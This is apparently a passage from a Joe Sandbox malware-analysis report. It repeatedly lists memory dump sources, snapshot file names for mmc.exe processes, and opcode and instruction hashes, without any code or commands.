                      • API String ID:
                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction ID: 054c0d896125e05004adcc90aed8cfc261fdf18a01a0ab9f5fa5ce3bcddec569
                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 0000001C.00000003.715746341.0000000004080000.00000010.00000800.00020000.00000000.sdmp, Offset: 04080000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_28_3_4080000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction ID: 054c0d896125e05004adcc90aed8cfc261fdf18a01a0ab9f5fa5ce3bcddec569
                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 0000001E.00000002.1545049537.00000000043E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_30_2_43e0000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction ID: 5805be83608a8cedd858d95db9ab9710ae757ae23db3cad1a8170ac2f645e6eb
                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 0000001E.00000002.1545049537.00000000043E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_30_2_43e0000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction ID: 5805be83608a8cedd858d95db9ab9710ae757ae23db3cad1a8170ac2f645e6eb
                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 0000001E.00000002.1545049537.00000000043E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 043E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_30_2_43e0000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction ID: 5805be83608a8cedd858d95db9ab9710ae757ae23db3cad1a8170ac2f645e6eb
                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 0000001E.00000003.731907634.0000000004310000.00000010.00000800.00020000.00000000.sdmp, Offset: 04310000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_30_3_4310000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction ID: 5757185db331e8b88f0efd0d6eba9c6cc04a741ec0137de86b29164014065ac9
                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000020.00000002.1539229807.0000000002CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_32_2_2cd0000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction ID: ddeea59720794d5afe9eae3dc2319f6bfb28ff43c2a0033205c7d2fb49462d5f
                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000020.00000002.1539229807.0000000002CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_32_2_2cd0000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction ID: ddeea59720794d5afe9eae3dc2319f6bfb28ff43c2a0033205c7d2fb49462d5f
                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000020.00000002.1539229807.0000000002CD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_32_2_2cd0000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction ID: ddeea59720794d5afe9eae3dc2319f6bfb28ff43c2a0033205c7d2fb49462d5f
                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000020.00000003.761492872.0000000002B80000.00000010.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_32_3_2b80000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction ID: 6ae847a0bbe197258a3eb17339fa6bc20db5958ad7cb607b9a27e163c5366175
                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000022.00000002.1545774206.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_34_2_4440000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
                      • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000022.00000002.1545774206.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_34_2_4440000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
                      • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000022.00000002.1545774206.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_34_2_4440000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
                      • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000022.00000002.1545774206.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_34_2_4440000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
                      • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000024.00000002.1544384322.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_36_2_4440000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
                      • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000024.00000002.1544384322.0000000004440000.00000010.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_36_2_4440000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction ID: db48005864477bbda82a2b26ef7261c25fa1f591f6937272b498ef7a20314238
                      • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000024.00000003.809404294.0000000004280000.00000010.00000800.00020000.00000000.sdmp, Offset: 04280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_36_3_4280000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction ID: b7f980c7b5fba0be6f59108c27dc6df59f81921bbdca6dab577c688894ca9288
                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000024.00000003.809404294.0000000004280000.00000010.00000800.00020000.00000000.sdmp, Offset: 04280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_36_3_4280000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction ID: b7f980c7b5fba0be6f59108c27dc6df59f81921bbdca6dab577c688894ca9288
                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000024.00000003.809404294.0000000004280000.00000010.00000800.00020000.00000000.sdmp, Offset: 04280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_36_3_4280000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction ID: b7f980c7b5fba0be6f59108c27dc6df59f81921bbdca6dab577c688894ca9288
                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000026.00000002.1536477224.0000000002950000.00000010.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_38_2_2950000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction ID: 97db126d3f56b2ac21e49ad1b98eaf45512690a3b5ea74c8a7c933c9d8e28c3f
                      • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000026.00000002.1536477224.0000000002950000.00000010.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_38_2_2950000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction ID: 97db126d3f56b2ac21e49ad1b98eaf45512690a3b5ea74c8a7c933c9d8e28c3f
                      • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000026.00000002.1536477224.0000000002950000.00000010.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_38_2_2950000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction ID: 97db126d3f56b2ac21e49ad1b98eaf45512690a3b5ea74c8a7c933c9d8e28c3f
                      • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                      • Instruction Fuzzy Hash:
                      Memory Dump Source
                      • Source File: 00000026.00000003.825271758.0000000002890000.00000010.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_38_3_2890000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction ID: 29008aab73a2e0d59e06effafcc39236ac62b1ceb3f8633c13798d7c77d9ea12
                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                      • Instruction Fuzzy Hash: